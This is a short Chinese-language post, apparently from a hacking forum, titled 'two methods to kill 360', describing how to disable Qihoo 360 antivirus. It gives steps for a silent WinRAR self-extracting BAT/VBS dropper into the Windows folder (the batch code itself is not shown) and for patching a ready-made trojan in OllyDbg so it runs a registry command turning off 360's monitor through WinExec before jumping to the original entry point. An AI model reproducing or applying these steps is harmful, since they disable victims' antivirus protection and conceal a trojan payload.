兩種方法:
(一) BAT+VBS+RAR
BAT代碼如下:
(代碼一貼上來,居然被網(wǎng)站監(jiān)控為不安全信息,不讓發(fā)布,暈4)
然后用WINRAR建立自解壓文件
路徑:c:\windows
解壓后運行:vbs文件名.vbs
安靜模式:全部隱藏
覆蓋方式:覆蓋所有文件
做完即可,
干掉360的兩種方法
,電腦資料
《干掉360的兩種方法》(http://www.lotusphilosophies.com)。(二) ASM匯編
這個是最舒服的,用OD打開已經(jīng)配置好的馬,找0區(qū)(也可以用TOPO加空段)要很大一片哦!右擊,選擇“二進制”→“編輯”,在ASCII中輸入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”記下寫入命令的改動的第一個地址,假設(shè)為401180。
再找一個小空段,記下地址,假設(shè)為40116A
寫入:
Push 401180 (也就是那個改動的地址)
Call WinExec
Jmp 原程序入口點(在OD右邊)